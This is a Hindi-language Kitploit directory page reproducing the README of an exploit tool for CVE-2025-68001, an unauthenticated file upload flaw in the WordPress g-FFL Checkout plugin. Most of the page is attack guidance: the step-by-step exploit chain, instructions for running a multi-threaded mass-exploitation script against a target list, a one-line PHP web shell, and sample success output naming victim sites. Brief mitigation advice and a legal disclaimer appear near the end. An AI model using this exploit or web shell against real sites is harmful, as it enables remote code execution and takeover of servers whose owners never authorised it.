Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68001 — WordPress g-FFL Checkout Plugin <= 2.1.0 एक उच्च प्राथमिकता वाले मनमाना फ़ाइल अपलोड के लिए असुरक्षित है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-68001
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubnxploited/cve-2025-68001

CVE-2025-68001

WordPress g-FFL Checkout Plugin <= 2.1.0 एक उच्च प्राथमिकता वाले मनमाना फ़ाइल अपलोड के लिए असुरक्षित है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68001

WordPress g-FFL Checkout प्लगइन <= 2.1.0 उच्च प्राथमिकता वाले Arbitrary File Upload के लिए संवेदनशील है।

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 वक्र से आगे रहें। टेलीग्राम पर @KNxploited से जुड़ें — नवीनतम CVEs, zero-days, और अत्याधुनिक एक्सप्लॉइट रिसर्च का आपका विशेष स्रोत। लगातार अपडेट किया जाता है। सबके लिए नहीं।


📋 अवलोकन

CVE-2025-68001 एक महत्वपूर्ण Unauthenticated Arbitrary File Upload कमज़ोरी है जो garidium द्वारा g-FFL Checkout WordPress प्लगइन में पाई गई।

यह कमज़ोरी एक अप्रमाणित दूरस्थ हमलावर को ffl_upload_document AJAX क्रिया के माध्यम से लक्ष्य सर्वर पर मनमानी फ़ाइलें — वेब शेल सहित — अपलोड करने की अनुमति देती है, जिससे पूर्ण Remote Code Execution (RCE) होता है।


⚙️ यह कैसे काम करता है

एक्सप्लॉइट एक सटीक बहु-चरणीय हमला श्रृंखला का अनुसरण करता है:

root@kitploit:~
1. GET /checkout
      ↓
   Extract `checkout_nonce` from inline JavaScript data

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disguised as image/png>
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️

प्लगइन एक AJAX एंडपॉइंट ffl_upload_document प्रस्तुत करता है जो:

  • बिना प्रमाणीकरण जांच के फ़ाइल अपलोड स्वीकार करता है
  • सर्वर-साइड फ़ाइल प्रकार सत्यापन नहीं करता
  • अपने JSON प्रतिक्रिया में संग्रहीत फ़ाइल पथ लौटाता है

🔧 आवश्यकताएँ

चलाने से पहले सभी निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests rich
निर्भरताउद्देश्य
requestsHTTP अनुरोध और सत्र प्रबंधन
richटर्मिनल UI, प्रगति पट्टियाँ, पैनल
threadingमल्टी-थ्रेडेड लक्ष्य प्रसंस्करण

Python 3.8+ आवश्यक है।


📂 फ़ाइल संरचना

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output

🚀 उपयोग

चरण 1 — अपने लक्ष्य तैयार करें

एक list.txt फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक लक्ष्य URL हो:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

स्क्रिप्ट स्वचालित रूप से http:// जोड़ देती है यदि कोई स्कीम प्रदान नहीं की गई है।


चरण 2 — अपना शेल तैयार करें

अपना PHP वेब शेल उसी निर्देशिका में रखें। न्यूनतम शेल का उदाहरण:

root@kitploit:~
<?php system($_GET['cmd']); ?>

इसे shell.php (या कोई भी नाम — आपसे इसे दर्ज करने के लिए कहा जाएगा) के रूप में सहेजें।


चरण 3 — एक्सप्लॉइट चलाएँ

root@kitploit:~
python CVE-2025-68001.py

आपसे इंटरैक्टिव रूप से पूछा जाएगा:

root@kitploit:~
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

चरण 4 — परिणामों की समीक्षा करें

सफल एक्सप्लॉइट स्वचालित रूप से success_results.txt में सहेजे जाते हैं:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

प्रत्येक पंक्ति में शामिल हैं:

  • लक्ष्य URL
  • सर्वर पर संग्रहीत फ़ाइल पथ
  • सर्वर द्वारा निर्दिष्ट अद्वितीय फ़ाइल नाम
  • मूल अपलोड की गई फ़ाइल का नाम

🖥️ स्क्रिप्ट पैरामीटर संदर्भ

संकेतडिफ़ॉल्टविवरण
लक्ष्य फ़ाइलlist.txtलक्ष्य URL वाली फ़ाइल

📊 आउटपुट उदाहरण

root@kitploit:~
✔  https://victim.com  — /checkout पहुंच योग्य। एक्सप्लॉइट करने का प्रयास...

┌─────────────────────────────────────────────────────┐
│                      सफलता                        │
│  https://victim.com                                 │
│  मूल नाम:  shell.php                          │
│  अद्वितीय नाम:    a7f3c1d9e.php                      │
│  संग्रहीत पथ:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

सभी लक्ष्य संसाधित ✔️। परिणाम success_results.txt में सहेजे गए।

🔍 संवेदनशील कोड पथ (तकनीकी)

यह कमज़ोरी प्लगइन के AJAX हैंडलर में स्थित है जो क्षमता जांच के बिना पंजीकृत है:

root@kitploit:~
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ शमन एवं उपचार

यदि आप साइट स्वामी या डेवलपर हैं, तो तुरंत निम्नलिखित कदम उठाएँ:

  • ✅ अपडेट करें यदि उपलब्ध हो तो g-ffl-checkout प्लगइन को पैच किए गए संस्करण (> 2.1.0) में अपडेट करें
  • ✅ अक्षम करें पैच की पुष्टि होने तक प्लगइन को अक्षम करें
  • ✅ प्रतिबंधित करें अपलोड निर्देशिकाओं में निष्पादन अनुमतियाँ (जैसे .htaccess नियम)
  • ✅ लागू करें सर्वर-साइड फ़ाइल प्रकार सत्यापन और सख्त एक्सटेंशन व्हाइटलिस्टिंग
  • ✅ निगरानी करें संदिग्ध .php फ़ाइलों के लिए अपलोड निर्देशिकाओं की निगरानी करें
  • ✅ WAF नियम सक्षम करें अप्रमाणित AJAX फ़ाइल अपलोड अनुरोधों को ब्लॉक करने के लिए

⚠️ अस्वीकरण

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.

Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
  — Computer Fraud and Abuse Act (CFAA)
  — EU Directive on Attacks Against Information Systems
  — And equivalent laws in your jurisdiction.

USE RESPONSIBLY. HACK ETHICALLY.

👤 लेखक

हैंडलNxploited
टेलीग्राम@KNxploited
GitHubgithub.com/Nxploited

🔔 टेलीग्राम पर @KNxploited को फ़ॉलो करें नवीनतम कमज़ोरी प्रकटीकरण, एक्सप्लॉइट रिलीज़, और सुरक्षा अनुसंधान प्राप्त करने के लिए — किसी और से पहले।


**Nxploited** द्वारा सटीकता के साथ निर्मित · केवल शैक्षिक उपयोग के लिए
टूल डाउनलोड करें
क्षेत्रविवरण
CVE IDCVE-2025-68001
प्लगइनg-FFL Checkout (g-ffl-checkout)
प्रभावित संस्करणn/a through <= 2.1.0
कमज़ोरी का प्रकारUnrestricted File Upload
प्रभावRemote Code Execution (RCE)
प्रमाणीकरणआवश्यक नहीं
CVSS गंभीरतागंभीर
शोधकर्ताNxploited
शेल फ़ाइलshell.phpलक्ष्य पर अपलोड करने के लिए PHP शेल
थ्रेड्स की संख्या50समवर्ती कार्यकर्ता (अधिकतम: 50)